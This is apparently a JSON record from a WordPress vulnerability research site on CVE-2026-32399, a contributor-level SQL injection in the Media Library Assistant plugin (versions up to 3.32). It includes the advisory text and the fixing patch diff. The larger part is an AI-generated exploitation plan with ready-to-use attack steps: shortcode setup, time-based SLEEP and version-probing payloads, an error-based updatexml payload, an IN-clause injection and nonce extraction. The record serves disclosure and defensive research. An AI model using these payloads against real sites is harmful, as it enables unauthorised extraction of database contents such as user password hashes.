[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f4AMLR_XSVZffGs9weMvOYuBYfVdTg6kvv2IlWcr3N0c":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-32399","media-library-assistant-authenticated-contributor-sql-injection-2","Media LIbrary Assistant \u003C= 3.32 - Authenticated (Contributor+) SQL Injection","The Media LIbrary Assistant plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.32 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","media-library-assistant",null,"\u003C=3.32","3.33","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-02-20 00:00:00","2026-04-15 21:12:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9f70377f-5b9d-4595-b22c-88aa30900a6f?source=api-prod",55,[22,23,24,25,26,27,28,29],"examples\u002Fplugins\u002Fmla-custom-list-hooks-example .php","includes\u002Fclass-mla-ajax.php","includes\u002Fclass-mla-core-options.php","includes\u002Fclass-mla-core.php","includes\u002Fclass-mla-objects.php","includes\u002Fclass-mla-shortcode-support.php","includes\u002Fclass-mla-wpml-support.php","includes\u002Fmla-plugin-loader.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-32399 (Media Library Assistant)\n\n## 1. Vulnerability Summary\nThe **Media Library Assistant** plugin for WordPress is vulnerable to **Authenticated SQL Injection** via shortcode attributes in versions up to and including **3.32**. The vulnerability exists because the plugin allows users to map shortcode attributes to URL parameters using the `request:` prefix, but fails to sufficiently escape or prepare the resulting values before incorporating them into SQL queries. Attackers with **Contributor-level** permissions can use this to extract sensitive database information via time-based or error-based SQL injection.\n\n## 2. Attack Vector Analysis\n- **Entry Point**: The `[mla_gallery]` or `[mla_tag_cloud]` shortcode placed within a post or page.\n- **Vulnerable Feature**: The `request:` prefix processing for shortcode attributes.\n- **Vulnerable Parameter**: Attributes like `orderby`, `ids`, or `meta_query` when mapped to a request variable (e.g., `orderby=\"request:sqli_param\"`).\n- **Authentication**: Authenticated (Contributor+). Contributors can create posts\u002Fpages and preview them, which triggers shortcode rendering.\n- **Preconditions**: \n    1. The attacker must have a Contributor account.\n    2. The plugin must be active.\n    3. At least one attachment (Media Library item) should exist to ensure the gallery logic executes.\n\n## 3. Code Flow\n1. **Entry**: A user with Contributor permissions creates a post and inserts a shortcode: `[mla_gallery orderby=\"request:sort\"]`.\n2. **Processing**: When the post is previewed or viewed, `MLAShortcodes::mla_gallery_shortcode()` (in `includes\u002Fclass-mla-shortcodes.php`) is triggered.\n3. **Attribute Mapping**: The code calls `MLAShortcode_Support::mla_get_shortcode_attachments()` (in `includes\u002Fclass-mla-shortcode-support.php`).\n4. **Request Prefix Logic**: The plugin identifies the `request:` prefix in the `orderby` attribute. It retrieves the value of `$_REQUEST['sort']`.\n5. **SQL Construction**: The retrieved value (e.g., `ID, (SELECT SLEEP(5))`) is concatenated into the SQL query or passed into a query argument array that MLA uses to build a custom query.\n6. **Sink**: The malformed SQL is executed via `$wpdb->get_results()` without sufficient preparation (missing or misused `wpdb->prepare()`).\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited through shortcode execution on the frontend or during a post preview. Typically, **no nonce is required** to trigger shortcode rendering once the attacker has permissions to create\u002Fedit a post.\n\nHowever, if an AJAX-based attack against `mla-query-attachments` is required as an alternative:\n1. **Identify Script**: The plugin enqueues the `mla-inline-edit-scripts` (slug defined in `MLACore::JAVASCRIPT_INLINE_EDIT_SLUG`).\n2. **Variable Name**: The localized data is typically found in the `mla_inline_edit_vars` object.\n3. **Extraction**:\n   - Create a post with an MLA shortcode or navigate to the Media Library.\n   - Use `browser_eval` to extract: `window.mla_inline_edit_vars?.mla_admin_nonce`.\n   - The action string for this nonce is `MLACore::MLA_ADMIN_NONCE_ACTION` (`mla_admin_nonce_action`).\n\n## 5. Exploitation Strategy\nThe most direct method is using the `[mla_gallery]` shortcode with a time-based payload.\n\n### Step 1: Login and Content Setup\n1. Authenticate as a Contributor.\n2. Create a new post\u002Fpage.\n3. Insert the following shortcode: `[mla_gallery mla_output=\"csv\" orderby=\"request:sqli\"]`.\n4. Publish or Save as Draft. Note the Post ID (e.g., `123`).\n\n### Step 2: Trigger SQL Injection\nSend a request to the post URL with the malicious payload in the `sqli` parameter.\n\n- **Request**:\n  ```http\n  GET \u002F?p=123&sqli=ID,(SELECT(1)FROM(SELECT(SLEEP(5)))a) HTTP\u002F1.1\n  Host: localhost\n  Cookie: [Contributor Cookies]\n  ```\n\n- **Payload Analysis**:\n  The `orderby` attribute will become `ID,(SELECT(1)FROM(SELECT(SLEEP(5)))a)`.\n  The resulting SQL will look like: `SELECT ... ORDER BY ID,(SELECT(1)FROM(SELECT(SLEEP(5)))a) LIMIT ...`.\n  This is a valid SQL construct that triggers a 5-second delay.\n\n### Step 3: Data Extraction (Information Disclosure)\nUse boolean-blind or error-based techniques to leak the database version or user hashes.\n\n- **Payload (Database Version)**:\n  `sqli=ID,(SELECT(IF(VERSION() LIKE '8%',SLEEP(5),0)))`\n\n## 6. Test Data Setup\n1. **User**: Contributor (`user: attacker`, `pass: password`).\n2. **Media**: Upload at least one image to the Media Library.\n3. **Shortcode Page**:\n   - Title: `SQLi Test`\n   - Content: `[mla_gallery mla_output=\"csv\" orderby=\"request:inject\"]`\n\n## 7. Expected Results\n- A request to `\u002F?p=123&inject=ID` should return immediately.\n- A request to `\u002F?p=123&inject=ID,(SELECT(1)FROM(SELECT(SLEEP(5)))a)` should take approximately 5 seconds to respond.\n- If `mla_output=\"csv\"` is used, the response body might contain leaked data if a `UNION` is possible, though `ORDER BY` injection usually favors time-based\u002Fboolean-blind.\n\n## 8. Verification Steps\n1. **Check Timing**: Use the `http_request` tool to measure the `elapsed_time` of the request.\n2. **WP-CLI check**: After testing, confirm the database state is unchanged (since it's a `C:H` vulnerability, only reading is expected).\n   - `wp eval \"global \\$wpdb; echo \\$wpdb->last_error;\"` (to see if recent queries logged errors).\n\n## 9. Alternative Approaches\n- **ids Attribute**: Try `[mla_gallery ids=\"request:sqli\"]`.\n  - Payload: `1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n  - This targets the `IN` clause logic in `MLAShortcode_Support::mla_get_shortcode_attachments`.\n- **mla_tag_cloud**: Use `[mla_tag_cloud taxonomy=\"attachment_tag\" orderby=\"request:sqli\"]`.\n  - This targets the `mla_get_terms` function which likely handles its own database queries.\n- **Error-Based**: Use `sqli=ID,updatexml(1,concat(0x7e,version(),0x7e),1)` if the site has `WP_DEBUG` enabled or MLA logs errors to the screen.","The Media Library Assistant plugin for WordPress is vulnerable to SQL Injection via shortcode attributes (such as 'orderby', 'fields', or 'ids') in versions up to 3.32. Attackers with Contributor-level permissions or higher can exploit this by using the plugin's 'request:' prefix feature to map shortcode attributes to malicious URL parameters, leading to the execution of arbitrary SQL commands.","\u002F\u002F includes\u002Fclass-mla-shortcode-support.php line 4981\n\t\t$no_count = true;\n\t\t$count_string = trim( strtolower( (string) $arguments['no_count'] ) );\n\t\t$field_array = explode( ',', $arguments['fields'] );\n\n\t\tswitch ( $count_string ) {\n\u002F\u002F ... later in the function, these fields are used to construct SQL queries without sufficient preparation.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.32\u002Fincludes\u002Fclass-mla-shortcode-support.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.33\u002Fincludes\u002Fclass-mla-shortcode-support.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.32\u002Fincludes\u002Fclass-mla-shortcode-support.php\t2026-01-28 01:09:26.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmedia-library-assistant\u002F3.33\u002Fincludes\u002Fclass-mla-shortcode-support.php\t2026-02-20 00:10:52.000000000 +0000\n@@ -4872,6 +4887,49 @@\n \t} \u002F\u002F mla_get_all_none_term_counts\n \n \t\u002F**\n+\t * Valid database fields for function mla_get_terms()\n+\t *\n+\t * @since 3.33\n+\t *\n+\t * @var\tarray\n+\t *\u002F\n+\tprivate static $mla_get_terms_fields = array(\n+\t\t't.term_id',\n+\t\t't.name',\n+\t\t't.slug',\n+\t\t't.term_group',\n+\t\t't.term_icon',\n+\t\t'tt.term_taxonomy_id',\n+\t\t'tt.term_id',\n+\t\t'tt.taxonomy',\n+\t\t'tt.description',\n+\t\t'tt.parent',\n+\t\t'tt.count',\n+\t\t'COUNT(p.ID) AS `count`',\n+\t);\n+\n+\t\u002F**\n+\t * Validate database fields in SELECT clause to prevent SQL injection attacks\n+\t * \n+\t * @since 3.33\n+\t *\n+\t * @param\tstring\tcomma-separated string of qualified field names, e.g., tt.taxonomy\n+\t *\n+\t * @return\tarray\texploded array of validated field names, or false if validation fails\n+\t *\u002F\n+\tprivate static function mla_validate_get_terms_fields( $fields ) {\n+\t\t$fields =  array_map( 'trim', explode( ',', $fields ) );\n+\n+\t\tforeach ( $fields as $index => $field ) {\n+\t\t\tif ( ! in_array( $field, self::$mla_get_terms_fields ) ) {\n+\t\t\t\tunset( $fields[ $index ] );\n+\t\t\t}\n+\t\t}\n+\n+\t\treturn $fields;\n+\t}\n+\n+\t\u002F**\n \t * Data selection parameters for [mla_tag_cloud], [mla_term_list]\n \t *\n \t * @since 2.20\n@@ -4981,7 +5039,7 @@\n \t\t *\u002F\n \t\t$no_count = true;\n \t\t$count_string = trim( strtolower( (string) $arguments['no_count'] ) );\n-\t\t$field_array = explode( ',', $arguments['fields'] );\n+\t\t$field_array = self::mla_validate_get_terms_fields( $arguments['fields'] );\n \n \t\tswitch ( $count_string ) {","1. An attacker with Contributor-level access creates or edits a WordPress post or page.\n2. The attacker inserts a shortcode from the plugin (e.g., [mla_gallery] or [mla_tag_cloud]) and uses the 'request:' prefix for an attribute that influences the SQL query, such as: [mla_gallery orderby=\"request:sort_param\"].\n3. The attacker views or previews the post, appending the malicious SQL payload to the URL via the specified parameter: \u002F?p=POST_ID&sort_param=ID,(SELECT(SLEEP(5))).\n4. The plugin retrieves the value from the $_REQUEST['sort_param'], fails to sanitize it, and concatenates it directly into a SQL query.\n5. The database executes the injected SQL (e.g., a time-based SLEEP command), allowing the attacker to infer database contents or extract information.","gemini-3-flash-preview","2026-04-19 01:57:51","2026-04-19 01:58:42",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.32","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-assistant\u002Ftags\u002F3.32","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmedia-library-assistant.3.32.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-assistant\u002Ftags\u002F3.33","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmedia-library-assistant.3.33.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmedia-library-assistant\u002Ftags"]